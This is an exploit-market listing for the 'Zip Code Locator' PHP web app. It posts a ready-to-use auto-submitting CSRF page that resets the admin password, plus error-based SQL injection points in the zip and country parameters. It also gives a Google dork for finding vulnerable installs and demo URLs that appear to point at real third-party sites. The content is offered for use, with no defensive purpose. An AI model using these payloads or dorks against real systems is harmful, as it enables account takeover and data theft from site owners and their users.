[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Zip Code Locator - CSRF/SQLi Vulnerabilities

[ 0Day-ID-19593 ]
Full title
Zip Code Locator - CSRF/SQLi Vulnerabilities [ Highlight ]
Highlight - is paid service, that can help to get more visitors to your material.

Price: 10
Date add
Category
Platform
Verified
Price
free
Risk
[
Security Risk Low
]
Rel. releases
Description
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm DaOne member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
##########################################
# Exploit Title: Zip Code Locator - CSRF/SQLi Vulnerabilities
# Date: 2012-10-19
# Author: DaOne aka Mocking Bird
# Home: 1337day Inj3ct0r Exploit Database
# Software Link: http://www.lookuprunner.com
# Category: webapps/php
# Version: 1.3.1-> 1.3.13
# Price: $149
# Google dork: O_o intext:"Zip Code Locator by Lookup Runner"
##########################################
[#] [CSRF Change Admin Password]:
<html>
<body onload="document.form.submit();">
<form action="http://[target]/index.php" method="post" name="form">
<input type="hidden" name="email" value="admin@email.com">
<input type="hidden" name="new_password" value="passw0rd">
<input type="hidden" name="new_password2" value="passw0rd">
<input type="hidden" name="panel" value="admin/profile">
<input type="hidden" name="action" value="update">
</form>
</body>
</html>

[#] [SQL Injection]:
http://[host]/index.php?zip=[Error Based Injection]
http://[host]/index.php?zip=60070&country=[Error Based Injection]
# Demo:
http://www.lookuprunner.com/demo/?zip=60070&within=25&country=1
http://www.galaxyfireworks.com/zip/?zip=60070&within=25&country=1
http://www.fixingyou.net/search/?zip=1
#
Thanks to: TheGreaTTeAm/LCA and Inj3ct0r Team.
Vendor
http://www.lookuprunner.com
Affected ver
1.3.1>=1.3.13
Other Information
Abuses
0
Comments
0
Views
4 537
We DO NOT use Telegram or any messengers / social networks! We DO NOT use Telegram or any messengers / social networks! Please, beware of scammers!
free
Open Exploit
You can open this source code for free
Open Exploit
Open Exploit
You can open this source code for free
Author
BL
29
Exploits
78
Readers
6
[ Comments: 0 ]
Terms of use of comments:
  • Users are forbidden to exchange personal contact details
  • Haggle on other sites\projects is forbidden
  • Reselling is forbidden
Punishment: permanent block of user account with all Gold.

Login or register to leave comments